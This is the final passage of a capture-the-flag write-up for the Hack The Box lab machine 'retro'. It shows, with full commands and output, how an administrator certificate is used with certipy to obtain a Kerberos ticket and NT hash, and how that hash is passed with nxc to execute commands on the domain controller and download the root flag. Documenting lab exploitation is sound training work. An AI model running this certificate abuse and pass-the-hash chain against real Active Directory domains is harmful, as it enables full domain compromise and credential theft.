[*] Request ID is 9
[*] Successfully requested certificate
[*] Got certificate with multiple identities
UPN: 'administrator@retro.vl'
DNS Host Name: 'dc.retro.vl'
[*] Certificate object SID is 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Saving certificate and private key to 'administrator_dc.pfx'
[*] Wrote certificate and private key to 'administrator_dc.pfx'
Cool, we now have the Administrator's PFX file. Now all we need to do is authenticate as Administrator for total domain takeover and grab the last flag.
certipy-ad auth -pfx administrator_dc.pfx -dc-ip 10.129.25.17
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@retro.vl'
[*] SAN DNS Host Name: 'dc.retro.vl'
[*] SAN URL SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Security Extension SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Found multiple identities in certificate
[*] Please select an identity:
[0] UPN: 'administrator@retro.vl' (administrator@retro.vl)
[1] DNS Host Name: 'dc.retro.vl' (dc$@retro.vl)
> 0
[*] Using principal: 'administrator@retro.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252*********************89
Now that we have the Administrator's NTLM hash we can pass-the-hash to gain access to the DC. First we verify this.
nxc smb dc -u administrator -H 252*********************89 -X 'whoami;hostname'
SMB 10.129.25.17 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.25.17 445 DC [+] retro.vl\administrator:252*********************89 (Pwn3d!)
SMB 10.129.25.17 445 DC [+] Executed command via wmiexec
SMB 10.129.25.17 445 DC retro\administrator
SMB 10.129.25.17 445 DC DC
Confirmed Domain Compromise.
Download the last flag file ‘root.txt’ with NXC.
nxc smb dc -u administrator -H 252**********************89 --shares --get-file /users/administrator/desktop/root.txt root.txt
SMB 10.129.25.17 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.25.17 445 DC [+] retro.vl\administrator:252*********************89 (Pwn3d!)
SMB 10.129.25.17 445 DC [*] Enumerated shares
SMB 10.129.25.17 445 DC Share Permissions Remark
SMB 10.129.25.17 445 DC ----- ----------- ------
SMB 10.129.25.17 445 DC ADMIN$ READ,WRITE Remote Admin
SMB 10.129.25.17 445 DC C$ READ,WRITE Default share
SMB 10.129.25.17 445 DC IPC$ READ Remote IPC
SMB 10.129.25.17 445 DC NETLOGON READ,WRITE Logon server share
SMB 10.129.25.17 445 DC Notes READ
SMB 10.129.25.17 445 DC SYSVOL READ,WRITE Logon server share
SMB 10.129.25.17 445 DC Trainees READ
SMB 10.129.25.17 445 DC [*] Copying "/users/administrator/desktop/root.txt" to "root.txt"
SMB 10.129.25.17 445 DC [+] File "/users/administrator/desktop/root.txt" was downloaded to "root.txt"
┌──(red㉿redteam)-[~/.Hacking/HTB/retro]
└─$ cat root.txt
40f*****************71
And that’s the box completed with full domain control. At this point we can do whatever we want.